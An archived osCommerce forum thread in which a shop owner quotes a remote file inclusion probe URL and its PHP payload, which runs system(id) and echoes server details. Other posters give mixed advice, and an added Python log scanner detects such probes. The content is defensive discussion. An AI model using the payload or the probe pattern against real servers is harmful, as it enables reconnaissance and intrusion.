
osCommerce

The e-commerce.

Potential Security Threat?


Benjjj6


Hi

 

Via the Who's Online page I caught someone running this script on my site today:

 

They went to: http://www.mysite.com//?p=http://pikappaal...mages/idd.txt???

 

I visited that exact address and it just redirected to my homepage, so I hope that means it hasn't affected my site at all. I have FWR Security Pro & URL Validator installed as well as Site Monitor.

 

If you view that page without mysite beforehand you can see the contents of the .txt file are:

 

<?php
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

 

Are there any other security contributions I should add? What passwords would this script have affected, what usernames/passwords should I now change?

 

Thanks

 

Ben

Link to comment
Share on other sites

Yes you have been hacked.

 

Try Google on

 

"0sirys was here"

 

Delete the file, change admin user name and passwords. Make passwords more complex. Review permissions on your site. (The last is a shameless plug for one of my contributions)

 

I'll leave you to work out more things you need to do ....

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Hi Geoffrey,

 

Are you sure I have been hacked? I ask because you said to delete the file (I assume you mean idd.txt). However, I can't find it on my server. Also, as I have a number of security contributions already installed, is there no way to prevent against this sort of attack!?

 

Passwords were already complex and admin had been renamed.

 

I will try your contribution though, thank you :)

Link to comment
Share on other sites

Did you try the Google solution?


Link to comment
Share on other sites

I did try and search for what you specified. I only got 3 results with the term in quotes though. Also without the quotes I didn't find much either.

 

Someone on webhosting talk said "mod_security rule should prevent them" but this doesn't mean much to me.

 

If this is a well-known exploit, surely there should be a way of preventing it?

Link to comment
Share on other sites

I don't think you have been hacked, the fact that you clicked on the URL mentioned and saw nothing out of the ordinary implies you don't have the security hole required.

 

I see these in my own who's online page and I know my files are clean.

Link to comment
Share on other sites
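
Added example (not part of the thread, osCommerce, or any contribution named here): a log scanner for the kind of request reported in the first post, where a query parameter carries a remote URL. The log lines, hostnames, IP addresses and the function names `find_rfi_probes` and `probes_by_ip` are constructed for illustration; the status-based triage label is a heuristic, not proof either way.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (not from the poster's server).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2010:10:01:02 +0000] "GET //?p=http://files.example.net/images/idd.txt??? HTTP/1.1" 302 0 "-" "libwww-perl/5.805"
198.51.100.4 - - [12/Mar/2010:10:02:10 +0000] "GET /product_info.php?products_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2010:10:03:44 +0000] "GET /index.php?page=hTTp%3A%2F%2Ffiles.example.net%2Fidd.txt%3F HTTP/1.1" 200 734 "-" "libwww-perl/5.805"
198.51.100.9 - - [12/Mar/2010:10:05:00 +0000] "GET /redirect.php?action=url&goto=www.example.org HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client IP, request target and status code from a combined-format line
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# a parameter value that is itself a remote URL, in any letter case
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return one record per query parameter whose decoded value is a remote URL."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        query = target.partition("?")[2]
        # parse_qsl percent-decodes values, so encoded probes are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                probes.append({
                    "ip": ip, "param": name, "url": value, "status": status,
                    # trailing '?' characters, as in the URL quoted in this thread
                    "padded": value.endswith("?"),
                    # heuristic: a 2xx means a page was served, so check what it did
                    "triage": "needs-review" if 200 <= status < 300 else "not-served",
                })
    return probes


def probes_by_ip(probes):
    """Count flagged requests per client address."""
    return dict(Counter(p["ip"] for p in probes))


if __name__ == "__main__":
    for probe in find_rfi_probes(SAMPLE_LOG):
        print(probe)
```

A legitimate parameter that carries a full URL (a redirect target, for example) matches as well, so treat each hit as a lead to check against the code that handles that parameter.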

Hey Mark,

 

That's what I had assumed. I thought, surely if the hack had been successful then when I visited that page it should show all the server information the script requested, but instead it just redirected to the homepage.

 

I hope I haven't been hacked *fingers crossed*!

 

 

btw. I found out that the IP address the user was using was from Russia....

Link to comment
Share on other sites

There were some good tips in the third one.


Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.
